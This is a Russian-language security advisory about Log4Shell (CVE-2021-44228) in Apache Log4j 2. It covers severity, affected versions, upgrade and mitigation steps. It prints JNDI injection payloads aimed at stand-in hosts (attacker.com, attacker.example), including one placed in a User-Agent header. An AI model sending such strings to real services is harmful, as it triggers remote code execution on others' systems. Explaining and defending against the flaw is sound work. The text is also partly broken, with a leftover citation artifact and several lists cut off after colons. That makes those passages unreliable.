
CVE-2021-44228
Критическая уязвимость удаленного выполнения кода в Apache Log4j 2, широко известная как Log4Shell.
CVE-2021-44228 — это критическая уязвимость RCE в :contentReference[oaicite:0]{index=0} версии 2.x (до 2.15.0), обнаруженная в декабре 2021 года.
Она позволяет неаутентифицированным удаленным злоумышленникам выполнять произвольный код на уязвимых системах, просто отправляя специально подготовленные данные, которые регистрируются Log4j. Ошибка затрагивает бесчисленное количество Java-приложений и сервисов по всему миру.
Уязвимость возникает из-за обработки Log4j JNDI-поисков в регистрируемых строках. Злоумышленник может внедрить вредоносный JNDI-ресурс в регистрируемое сообщение (например, LDAP, DNS), например:
${jndi:ldap://attacker.com/a}
Log4j выполнит:
Это позволяет злоумышленнику добиться полного удаленного выполнения кода (RCE) на затронутых сервисах.
| Метрика | Значение |
|---|---|
| CVSS v3.1 Базовая оценка | 10.0 (Критический) |
| Вектор атаки | Сеть |
| Требуемые привилегии | Нет |
| Взаимодействие с пользователем | Нет |
| Аутентификация | Не требуется |
| Воздействие | Полный RCE |
Поскольку Log4j используется в бесчисленных библиотеках и приложениях, любая система, регистрирующая ненадежные данные, может быть уязвима.
Следующие версии Log4j 2 являются уязвимыми:
>= 2.0-beta9 and < 2.15.0
Кроме того, некоторые конфигурации 2.15.0 все еще были эксплуатируемы, поэтому 2.16.0 и выше являются безопасным базовым уровнем.
Обновитесь до версий Log4j 2:
2.17.1 или новее
Более поздние патчи дополнительно повышают безопасность (например, 2.17.2, 2.19.0 и т.д.).
Если немедленное обновление невозможно, вы можете:
log4j2.formatMsgNoLookups=true
JndiLookup из classpath:
zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Эти шаги помогут снизить подверженность риску до тех пор, пока вы не сможете выполнить обновление.



Эту уязвимость чрезвычайно легко эксплуатировать. Злоумышленнику достаточно отправить специально сформированную строку (например, через HTTP-заголовки, параметры формы, сообщения чата, поля базы данных), которая будет зарегистрирована приложением:
User-Agent: ${jndi:ldap://attacker.example/a}
После регистрации приложение выполнит удаленный поиск и может быть вынуждено выполнить Java-код, контролируемый злоумышленником.
Log4Shell оказала огромное глобальное влияние:
Это одна из самых значительных уязвимостей за последние десятилетия.
Вы можете обнаружить уязвимые системы:
${jndi:)| Поле | Значение |
|---|---|
| Идентификатор CVE | CVE-2021-44228 |
| Псевдоним | Log4Shell |
| Продукт | Apache Log4j 2 |
| Серьезность | Критический (CVSS 10.0) |
| Тип | Удаленное выполнение кода |
| Воздействие | Полная компрометация системы |
| Эксплуатируемость | Чрезвычайно легко |
| Смягчение | Обновление до ≥ 2.17.1 |
Если ваше приложение или любая используемая вами библиотека полагаются на Log4j 2.x, немедленно обновитесь до исправленной версии (≥ 2.17.1) и убедитесь, что JNDI-поиски отключены или удалены, где это возможно.